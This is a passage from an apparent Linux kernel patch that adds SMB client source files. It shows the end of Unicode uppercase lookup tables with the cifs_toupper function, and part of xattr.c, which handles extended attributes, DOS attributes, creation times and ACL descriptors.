++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_a6[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa640, 0x0000, 0xa642, 0x0000, 0xa644, 0x0000, 0xa646,
++	0x0000, 0xa648, 0x0000, 0xa64a, 0x0000, 0xa64c, 0x0000, 0xa64e,
++	0x0000, 0xa650, 0x0000, 0xa652, 0x0000, 0xa654, 0x0000, 0xa656,
++	0x0000, 0xa658, 0x0000, 0xa65a, 0x0000, 0xa65c, 0x0000, 0xa65e,
++	0x0000, 0x0000, 0x0000, 0xa662, 0x0000, 0xa664, 0x0000, 0xa666,
++	0x0000, 0xa668, 0x0000, 0xa66a, 0x0000, 0xa66c, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa680, 0x0000, 0xa682, 0x0000, 0xa684, 0x0000, 0xa686,
++	0x0000, 0xa688, 0x0000, 0xa68a, 0x0000, 0xa68c, 0x0000, 0xa68e,
++	0x0000, 0xa690, 0x0000, 0xa692, 0x0000, 0xa694, 0x0000, 0xa696,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_a7[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0xa722, 0x0000, 0xa724, 0x0000, 0xa726,
++	0x0000, 0xa728, 0x0000, 0xa72a, 0x0000, 0xa72c, 0x0000, 0xa72e,
++	0x0000, 0x0000, 0x0000, 0xa732, 0x0000, 0xa734, 0x0000, 0xa736,
++	0x0000, 0xa738, 0x0000, 0xa73a, 0x0000, 0xa73c, 0x0000, 0xa73e,
++	0x0000, 0xa740, 0x0000, 0xa742, 0x0000, 0xa744, 0x0000, 0xa746,
++	0x0000, 0xa748, 0x0000, 0xa74a, 0x0000, 0xa74c, 0x0000, 0xa74e,
++	0x0000, 0xa750, 0x0000, 0xa752, 0x0000, 0xa754, 0x0000, 0xa756,
++	0x0000, 0xa758, 0x0000, 0xa75a, 0x0000, 0xa75c, 0x0000, 0xa75e,
++	0x0000, 0xa760, 0x0000, 0xa762, 0x0000, 0xa764, 0x0000, 0xa766,
++	0x0000, 0xa768, 0x0000, 0xa76a, 0x0000, 0xa76c, 0x0000, 0xa76e,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0xa779, 0x0000, 0xa77b, 0x0000, 0x0000, 0xa77e,
++	0x0000, 0xa780, 0x0000, 0xa782, 0x0000, 0xa784, 0x0000, 0xa786,
++	0x0000, 0x0000, 0x0000, 0x0000, 0xa78b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_ff[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xff21, 0xff22, 0xff23, 0xff24, 0xff25, 0xff26, 0xff27,
++	0xff28, 0xff29, 0xff2a, 0xff2b, 0xff2c, 0xff2d, 0xff2e, 0xff2f,
++	0xff30, 0xff31, 0xff32, 0xff33, 0xff34, 0xff35, 0xff36, 0xff37,
++	0xff38, 0xff39, 0xff3a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t *const toplevel[256] = {
++	t2_00, t2_01, t2_02, t2_03, t2_04, t2_05,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL, t2_1d, t2_1e, t2_1f,
++	NULL, t2_21,  NULL,  NULL, t2_24,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL, t2_2c, t2_2d,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_a6, t2_a7,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_ff,
++};
++
++/**
++ * cifs_toupper - convert a wchar_t from lower to uppercase
++ * @in: character to convert from lower to uppercase
++ *
++ * This function consults the static tables above to convert a wchar_t from
++ * lower to uppercase. In the event that there is no mapping, the original
++ * "in" character is returned.
++ */
++wchar_t
++cifs_toupper(wchar_t in)
++{
++	unsigned char idx;
++	const wchar_t *tbl;
++	wchar_t out;
++
++	/* grab upper byte */
++	idx = (in & 0xff00) >> 8;
++
++	/* find pointer to 2nd layer table */
++	tbl = toplevel[idx];
++	if (!tbl)
++		return in;
++
++	/* grab lower byte */
++	idx = in & 0xff;
++
++	/* look up character in table */
++	out = tbl[idx];
++	if (out)
++		return out;
++
++	return in;
++}
+diff --git a/fs/smb/client/xattr.c b/fs/smb/client/xattr.c
+new file mode 100644
+index 0000000000000..998fa51f9b684
+--- /dev/null
++++ b/fs/smb/client/xattr.c
+@@ -0,0 +1,555 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2003, 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/slab.h>
++#include <linux/xattr.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifs_ioctl.h"
++
++#define MAX_EA_VALUE_SIZE CIFSMaxBufSize
++#define CIFS_XATTR_CIFS_ACL "system.cifs_acl" /* DACL only */
++#define CIFS_XATTR_CIFS_NTSD "system.cifs_ntsd" /* owner plus DACL */
++#define CIFS_XATTR_CIFS_NTSD_FULL "system.cifs_ntsd_full" /* owner/DACL/SACL */
++#define CIFS_XATTR_ATTRIB "cifs.dosattrib"  /* full name: user.cifs.dosattrib */
++#define CIFS_XATTR_CREATETIME "cifs.creationtime"  /* user.cifs.creationtime */
++/*
++ * Although these three are just aliases for the above, need to move away from
++ * confusing users and using the 20+ year old term 'cifs' when it is no longer
++ * secure, replaced by SMB2 (then even more highly secure SMB3) many years ago
++ */
++#define SMB3_XATTR_CIFS_ACL "system.smb3_acl" /* DACL only */
++#define SMB3_XATTR_CIFS_NTSD "system.smb3_ntsd" /* owner plus DACL */
++#define SMB3_XATTR_CIFS_NTSD_FULL "system.smb3_ntsd_full" /* owner/DACL/SACL */
++#define SMB3_XATTR_ATTRIB "smb3.dosattrib"  /* full name: user.smb3.dosattrib */
++#define SMB3_XATTR_CREATETIME "smb3.creationtime"  /* user.smb3.creationtime */
++/* BB need to add server (Samba e.g) support for security and trusted prefix */
++
++enum { XATTR_USER, XATTR_CIFS_ACL, XATTR_ACL_ACCESS, XATTR_ACL_DEFAULT,
++	XATTR_CIFS_NTSD, XATTR_CIFS_NTSD_FULL };
++
++static int cifs_attrib_set(unsigned int xid, struct cifs_tcon *pTcon,
++			   struct inode *inode, const char *full_path,
++			   const void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	__u32 *pattrib = (__u32 *)value;
++	__u32 attrib;
++	FILE_BASIC_INFO info_buf;
++
++	if ((value == NULL) || (size != sizeof(__u32)))
++		return -ERANGE;
++
++	memset(&info_buf, 0, sizeof(info_buf));
++	attrib = *pattrib;
++	info_buf.Attributes = cpu_to_le32(attrib);
++	if (pTcon->ses->server->ops->set_file_info)
++		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
++				&info_buf, xid);
++	if (rc == 0)
++		CIFS_I(inode)->cifsAttrs = attrib;
++
++	return rc;
++}
++
++static int cifs_creation_time_set(unsigned int xid, struct cifs_tcon *pTcon,
++				  struct inode *inode, const char *full_path,
++				  const void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	__u64 *pcreation_time = (__u64 *)value;
++	__u64 creation_time;
++	FILE_BASIC_INFO info_buf;
++
++	if ((value == NULL) || (size != sizeof(__u64)))
++		return -ERANGE;
++
++	memset(&info_buf, 0, sizeof(info_buf));
++	creation_time = *pcreation_time;
++	info_buf.CreationTime = cpu_to_le64(creation_time);
++	if (pTcon->ses->server->ops->set_file_info)
++		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
++				&info_buf, xid);
++	if (rc == 0)
++		CIFS_I(inode)->createtime = creation_time;
++
++	return rc;
++}
++
++static int cifs_xattr_set(const struct xattr_handler *handler,
++			  struct user_namespace *mnt_userns,
++			  struct dentry *dentry, struct inode *inode,
++			  const char *name, const void *value,
++			  size_t size, int flags)
++{
++	int rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++	/* return dos attributes as pseudo xattr */
++	/* return alt name if available as pseudo attr */
++
++	/* if proc/fs/cifs/streamstoxattr is set then
++		search server for EAs or streams to
++		returns as xattrs */
++	if (size > MAX_EA_VALUE_SIZE) {
++		cifs_dbg(FYI, "size of EA value too large\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	switch (handler->flags) {
++	case XATTR_USER:
++		cifs_dbg(FYI, "%s:setting user xattr %s\n", __func__, name);
++		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
++		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
++			rc = cifs_attrib_set(xid, pTcon, inode, full_path,
++					value, size);
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			break;
++		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
++			   (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
++			rc = cifs_creation_time_set(xid, pTcon, inode,
++					full_path, value, size);
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			break;
++		}
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++			goto out;
++
++		if (pTcon->ses->server->ops->set_EA)
++			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
++				full_path, name, value, (__u16)size,
++				cifs_sb->local_nls, cifs_sb);
++		break;
++
++	case XATTR_CIFS_ACL:
++	case XATTR_CIFS_NTSD:
++	case XATTR_CIFS_NTSD_FULL: {
++		struct cifs_ntsd *pacl;
++
++		if (!value)
++			goto out;
++		pacl = kmalloc(size, GFP_KERNEL);
++		if (!pacl) {
++			rc = -ENOMEM;
++		} else {
++			memcpy(pacl, value, size);
++			if (pTcon->ses->server->ops->set_acl) {
++				int aclflags = 0;
++				rc = 0;
++
++				switch (handler->flags) {
++				case XATTR_CIFS_NTSD_FULL:
++					aclflags = (CIFS_ACL_OWNER |
++						    CIFS_ACL_GROUP |
++						    CIFS_ACL_DACL |
++						    CIFS_ACL_SACL);
++					break;
++				case XATTR_CIFS_NTSD:
++					aclflags = (CIFS_ACL_OWNER |
++						    CIFS_ACL_GROUP |
++						    CIFS_ACL_DACL);
++					break;
++				case XATTR_CIFS_ACL:
++				default:
++					aclflags = CIFS_ACL_DACL;
++				}
++
++				rc = pTcon->ses->server->ops->set_acl(pacl,
++					size, inode, full_path, aclflags);
++			} else {
++				rc = -EOPNOTSUPP;
++			}
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			kfree(pacl);
++		}
++		break;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case XATTR_ACL_ACCESS:
++#ifdef CONFIG_CIFS_POSIX
++		if (!value)
++			goto out;
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
++				value, (const int)size,
++				ACL_TYPE_ACCESS, cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++
++	case XATTR_ACL_DEFAULT:
++#ifdef CONFIG_CIFS_POSIX
++		if (!value)
++			goto out;
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
++				value, (const int)size,
++				ACL_TYPE_DEFAULT, cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	}
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int cifs_attrib_get(struct dentry *dentry,
++			   struct inode *inode, void *value,
++			   size_t size)
++{
++	ssize_t rc;
++	__u32 *pattribute;
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++
++	if (rc)
++		return rc;
++
++	if ((value == NULL) || (size == 0))
++		return sizeof(__u32);
++	else if (size < sizeof(__u32))
++		return -ERANGE;
++
++	/* return dos attributes as pseudo xattr */
++	pattribute = (__u32 *)value;
++	*pattribute = CIFS_I(inode)->cifsAttrs;
++
++	return sizeof(__u32);
++}
++
++static int cifs_creation_time_get(struct dentry *dentry, struct inode *inode,
++				  void *value, size_t size)
++{
++	ssize_t rc;
++	__u64 *pcreatetime;
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++	if (rc)
++		return rc;
++
++	if ((value == NULL) || (size == 0))
++		return sizeof(__u64);
++	else if (size < sizeof(__u64))
++		return -ERANGE;
++
++	/* return dos attributes as pseudo xattr */
++	pcreatetime = (__u64 *)value;
++	*pcreatetime = CIFS_I(inode)->createtime;
++	return sizeof(__u64);
++}
++
++
++static int cifs_xattr_get(const struct xattr_handler *handler,
++			  struct dentry *dentry, struct inode *inode,
++			  const char *name, void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	/* return alt name if available as pseudo attr */
++	switch (handler->flags) {
++	case XATTR_USER:
++		cifs_dbg(FYI, "%s:querying user xattr %s\n", __func__, name);
++		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
++		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
++			rc = cifs_attrib_get(dentry, inode, value, size);
++			break;
++		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
++		    (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
++			rc = cifs_creation_time_get(dentry, inode, value, size);
++			break;
++		}
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++			goto out;
++
++		if (pTcon->ses->server->ops->query_all_EAs)
++			rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
++				full_path, name, value, size, cifs_sb);
++		break;
++
++	case XATTR_CIFS_ACL:
++	case XATTR_CIFS_NTSD:
++	case XATTR_CIFS_NTSD_FULL: {
++		/*
++		 * fetch owner, DACL, and SACL if asked for full descriptor,
++		 * fetch owner and DACL otherwise
++		 */
++		u32 acllen, extra_info;
++		struct cifs_ntsd *pacl;
++
++		if (pTcon->ses->server->ops->get_acl == NULL)
++			goto out; /* rc already EOPNOTSUPP */
++
++		if (handler->flags == XATTR_CIFS_NTSD_FULL) {
++			extra_info = SACL_SECINFO;
++		} else {
++			extra_info = 0;
++		}
++		pacl = pTcon->ses->server->ops->get_acl(cifs_sb,
++				inode, full_path, &acllen, extra_info);
++		if (IS_ERR(pacl)) {
++			rc = PTR_ERR(pacl);
++			cifs_dbg(VFS, "%s: error %zd getting sec desc\n",
++				 __func__, rc);
++		} else {
++			if (value) {
++				if (acllen > size)
++					acllen = -ERANGE;
++				else
++					memcpy(value, pacl, acllen);
++			}
++			rc = acllen;
++			kfree(pacl);
++		}
++		break;
++	}
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case XATTR_ACL_ACCESS:
++#ifdef CONFIG_CIFS_POSIX
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
++				value, size, ACL_TYPE_ACCESS,
++				cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++
++	case XATTR_ACL_DEFAULT:
++#ifdef CONFIG_CIFS_POSIX
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
++				value, size, ACL_TYPE_DEFAULT,
++				cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++#endif /* ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	}
++
++	/* We could add an additional check for streams ie
++	    if proc/fs/cifs/streamstoxattr is set then
++		search server for EAs or streams to
++		returns as xattrs */
++
++	if (rc == -EINVAL)
++		rc = -EOPNOTSUPP;
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++ssize_t cifs_listxattr(struct dentry *direntry, char *data, size_t buf_size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++		return -EOPNOTSUPP;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto list_ea_exit;
++	}
++	/* return dos attributes as pseudo xattr */
++	/* return alt name if available as pseudo attr */
++
++	/* if proc/fs/cifs/streamstoxattr is set then
++		search server for EAs or streams to
++		returns as xattrs */
++
++	if (pTcon->ses->server->ops->query_all_EAs)
++		rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
++				full_path, NULL, data, buf_size, cifs_sb);
++list_ea_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static const struct xattr_handler cifs_user_xattr_handler = {
++	.prefix = XATTR_USER_PREFIX,
++	.flags = XATTR_USER,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/* os2.* attributes are treated like user.* attributes */
++static const struct xattr_handler cifs_os2_xattr_handler = {
++	.prefix = XATTR_OS2_PREFIX,
++	.flags = XATTR_USER,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
